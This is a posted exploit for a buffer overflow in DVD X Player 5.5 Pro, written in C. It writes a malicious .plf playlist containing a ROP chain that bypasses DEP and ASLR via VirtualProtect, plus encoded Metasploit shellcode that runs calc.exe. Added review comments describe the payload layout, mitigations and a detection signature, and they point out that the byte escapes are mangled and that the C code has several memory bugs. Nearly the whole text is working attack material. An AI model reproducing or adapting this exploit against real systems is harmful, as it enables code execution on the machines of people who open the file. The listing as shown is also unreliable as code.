DVD X Player 5.5.0 Pro / Standard Buffer Overflow
Posted on 30 August 2011
// # Author: sickness
// # Take a look at mona.py :) awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
// # -----------------------------------------------------------
// # Exploit Title: DVD X Player 5.5 Professional (.plf) Universal DEP + ASLR BYPASS
// # Software Download: http://www.dvd-x-player.com/download.html#dvdPlayer
// # Date: 30/08/2011
// # PoC: http://www.exploit-db.com/exploits/17745/
// # Tested on: Windows XP SP2, Windows XP SP3, Windows 7
// # Testers: _ming, g0tmi1k, corelanc0d3r, ryujin, sinn3r O_o.
//
// NOTE(review): the byte escapes inside every string literal below appear to
// have been mangled by page extraction (they read as plain "x02x67..."), so
// this listing is not a compilable copy of the original file. Treat it only
// as documentation of the payload layout, which is what the comments below
// describe.
//
// What the program does: it builds one heap buffer laid out as
//   260 bytes of 0x41 filler  ->  ROP chain  ->  15 NOP bytes  ->
//   encoded shellcode  ->  20 NOP bytes
// and writes the first 900 bytes of that buffer to "malicious.plf", the
// playlist format parsed by the vulnerable player. The ROP chain reads the
// VirtualProtect() address out of an import table entry in SkinScrollBar.Dll
// and uses gadgets at fixed addresses in EPG.dll (the "ASLR bypass" in the
// title presumably means those two modules are not relocated — confirm
// against the original advisory); it is the standard VirtualProtect DEP
// bypass, so mitigations that remove fixed-address modules (forced ASLR /
// per-module relocation) or that block VirtualProtect-to-RWX from ROP
// (control-flow integrity, return-address validation) address it. From a
// detection standpoint the artifact is a .plf file of exactly 900 bytes
// beginning with a long run of 0x41 followed by 0x61-0x6? DLL addresses.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

// NOTE(review): implicit-int "main()" is pre-C99 and rejected by modern
// compilers; usleep() used below also requires <unistd.h>, which is never
// included here.
main()
{
    // ROP chain, 25 dwords (100 bytes). Each entry is a little-endian
    // address or immediate; the trailing comment on each line is the
    // author's description of the gadget it points at.
    char rop[] =
    "x02x67x62x61" // # POP EAX # RETN [EPG.dll]
    "x90x90x90x90" // # PADDING
    "x90x90x90x90" // # PADDING
    "x90x90x90x90" // # PADDING
    "x90x90x90x90" // # PADDING
    "x08x11x01x10" // # POINTER TO VirtualProtect() [IAT SkinScrollBar.Dll]
    "xedx06x63x61" // # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
    "xd8x85x63x61" // # XCHG EAX,ESI # RETN 00 [EPG.dll]
    "x02xd2x62x61" // # POP EBP # RETN [EPG.dll]
    "xc8xcax60x61" // # PUSH ESP [EPG.dll]
    "x02x67x62x61" // # POP EAX # RETN [EPG.dll]
    "xffxfaxffxff" // # AFTER NEGATE --> 0x00000501   (dwSize argument)
    "x9cx7dx62x61" // # NEG EAX # RETN [EPG.dll]
    "x24x01x64x61" // # XCHG EAX,EBX # RETN [EPG.dll]
    "x02x67x62x61" // # POP EAX # RETN [EPG.dll]
    "xc0xffxffxff" // # AFTER NEGATE --> 0x00000040   (PAGE_EXECUTE_READWRITE)
    "x9cx7dx62x61" // # NEG EAX # RETN [EPG.dll]
    "xa2x8bx60x61" // # XCHG EAX,EDX # RETN [EPG.dll]
    "x04xb8x60x61" // # POP ECX # RETN [EPG.dll]
    "x01xb0x64x61" // # WRITABLE LOCATION [EPG.dll]   (lpflOldProtect argument)
    "x87xe5x62x61" // # POP EDI # RETN [EPG.dll]
    "x1dx08x63x61" // # RETN (ROP NOP) [EPG.dll]
    "x02x67x62x61" // # POP EAX # RETN [EPG.dll]
    "x90x90x90x90" // # PADDING
    "x31x08x62x61"; // # PUSHAD # RETN [EPG.dll]

    // # msfpayload windows/exec CMD=calc.exe R | msfencode -b "x00x0ax0dx1a" -t c
    // # Around 400 bytes for shellcode :)
    // As listed this is 227 bytes (15 lines of 15 bytes plus 2), well under
    // the author's 400-byte estimate.
    char sc[] =
    "xbax7ax70x9axd3xd9xc0xd9x74x24xf4x5ex31xc9xb1"
    "x33x31x56x12x83xc6x04x03x2cx7ex78x26x2cx96xf5"
    "xc9xccx67x66x43x29x56xb4x37x3axcbx08x33x6exe0"
    "xe3x11x9ax73x81xbdxadx34x2cx98x80xc5x80x24x4e"
    "x05x82xd8x8cx5ax64xe0x5fxafx65x25xbdx40x37xfe"
    "xcaxf3xa8x8bx8excfxc9x5bx85x70xb2xdex59x04x08"
    "xe0x89xb5x07xaax31xbdx40x0bx40x12x93x77x0bx1f"
    "x60x03x8axc9xb8xecxbdx35x16xd3x72xb8x66x13xb4"
    "x23x1dx6fxc7xdex26xb4xbax04xa2x29x1cxcex14x8a"
    "x9dx03xc2x59x91xe8x80x06xb5xefx45x3dxc1x64x68"
    "x92x40x3ex4fx36x09xe4xeex6fxf7x4bx0ex6fx5fx33"
    "xaaxfbx4dx20xccxa1x1bxb7x5cxdcx62xb7x5exdfxc4"
    "xd0x6fx54x8bxa7x6fxbfxe8x58x3axe2x58xf1xe3x76"
    "xd9x9cx13xadx1dx99x97x44xddx5ex87x2cxd8x1bx0f"
    "xdcx90x34xfaxe2x07x34x2fx81xc6xa6xb3x68x6dx4f"
    "x51x75";

    // NOTE(review): none of the four malloc() results is checked, and the
    // buffers are never freed (the process exits right after, so only the
    // NULL check matters). exploit is malloc'd, not calloc'd, so the bytes
    // past the assembled payload are uninitialized heap when fwrite() below
    // emits all 900.
    char *exploit=malloc(900),*junk=malloc(260),*junk2=malloc(15),*junk3=malloc(20);

    // NOTE(review): memset() fills every byte of junk/junk2/junk3 and leaves
    // no terminating NUL, so the strcpy()/strcat() calls that follow read
    // past the end of each of them (undefined behaviour; works only by
    // accident of what follows in the heap).
    memset(junk,0x41,260);
    memset(junk2,0x90,15);
    memset(junk3,0x90,20);

    // Assemble: filler, ROP chain, NOP sled, shellcode, trailing NOPs.
    // Summed from the literals above this is about 620 bytes, under the 900
    // allocated.
    strcpy(exploit,junk);
    strcat(exploit,rop);
    strcat(exploit,junk2);
    strcat(exploit,sc);
    strcat(exploit,junk3);

    printf(" DVD X Player Professional/Standard 5.5 ");
    printf("Author: sickness ");
    printf("Creating malicious .plf file, please wait. ");
    usleep(50000);

    // NOTE(review): fopen() result is unchecked (NULL on failure -> crash in
    // fwrite). The file is opened in text mode ("w") even though the content
    // is binary; "wb" is the portable choice for raw bytes. fwrite/fclose
    // return values are ignored as well.
    FILE *evil;
    evil=fopen("malicious.plf","w");
    fwrite(exploit,1,900,evil);
    fclose(evil);

    printf("File created! ");
    return 0;
}
